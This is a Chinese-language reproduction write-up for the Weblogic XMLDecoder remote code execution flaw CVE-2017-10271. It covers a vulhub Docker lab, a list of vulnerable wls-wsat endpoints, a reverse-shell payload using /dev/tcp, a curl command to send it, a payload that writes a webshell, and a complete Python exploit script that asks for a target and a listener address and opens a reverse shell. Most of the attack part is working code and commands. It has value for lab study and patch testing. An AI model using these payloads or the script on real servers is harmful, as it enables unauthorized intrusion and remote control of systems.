# Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 ## 漏洞描述 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 ## 影响版本 ``` Weblogic 10.3.6.0.0 Weblogic 12.1.3.0.0 Weblogic 12.2.1.0.0 Weblogic 12.2.1.2.0 ``` ## 环境搭建 ```plain git clone https://github.com/vulhub/vulhub.git cd vulhub/weblogic/CVE-2017-10271 docker-compose up -d ``` 访问 http://xxx.xxx.xxx.xxx:7001 正常即可![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225400.png) ## 漏洞复现 对 http://xxx.xxx.xxx.xxx:7001/wls-wsat/CoordinatorPortType 进行访问,存在这个url则可能存在漏洞 ```plain 其他可利用URL /wls-wsat/CoordinatorPortType /wls-wsat/RegistrationPortTypeRPC /wls-wsat/ParticipantPortType /wls-wsat/RegistrationRequesterPortType /wls-wsat/CoordinatorPortType11 /wls-wsat/RegistrationPortTypeRPC11 /wls-wsat/ParticipantPortType11 /wls-wsat/RegistrationRequesterPortType11 ``` ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225406.png) 使用POST方法上传以下数据反弹一个shell ```xml /bin/bash -c bash -i >& /dev/tcp/10.0.0.1/21 0>&1 ``` 使用Curl反弹shell (将上面的xml数据保存为poc.xml) ```shell curl -v -X POST -H "Content-Type: text/xml" --data @poc.xml "http://xxx.xxx.xxx.xxx:7001/wls-wsat/CoordinatorPortType" ``` ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225539.png) 也可以通过漏洞写入webshell文件 ```xml servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp ]]> ``` 访问 http://xxx.xxx.xxx.xxx:7001/bea_wls_internal/test.jsp 即可得到写入的文件 ## 漏洞POC 利用 [weblogic-scan](https://github.com/kingkaki/weblogic-scan)快速检测 ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225528.png) - 反弹shell exp ```python #!/usr/bin/python3 #-*- coding:utf-8 -*- # author : PeiQi # from : http://wiki.peiqi.tech import requests import sys import json def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m') print('+ \033[34m公众号 : PeiQi文库 \033[0m') print('+ \033[34mVersion: Weblogic 10.3.6.0.0 \033[0m') print('+ \033[34m Weblogic 12.1.3.0.0 \033[0m') print('+ \033[34m Weblogic 12.2.1.0.0 \033[0m') print('+ \033[34m Weblogic 12.2.1.2.0 \033[0m') print('+ \033[36m使用格式: python3 CVE-2017-10271.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:7001 \033[0m') print('+ \033[36mCmd >>> shell(反弹shell) \033[0m') print('+------------------------------------------') def POC_1(target_url, IP, PORT): vuln_url = target_url + "/wls-wsat/CoordinatorPortType" headers = { "Content-Type": "text/xml", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", } data = """ /bin/bash -c bash -i >& /dev/tcp/%s/%s 0>&1 """ % (IP,PORT) try: response = requests.request("POST", url=vuln_url, headers=headers, data=data) except: print("\033[31m[x] 漏洞利用失败 \033[0m") if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) IP = str(input("\033[35m请输入监听IP >>> \033[0m")) PORT = str(input("\033[35m请输入监听PORT >>> \033[0m")) POC_1(target_url, IP, PORT) ``` ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225540.png)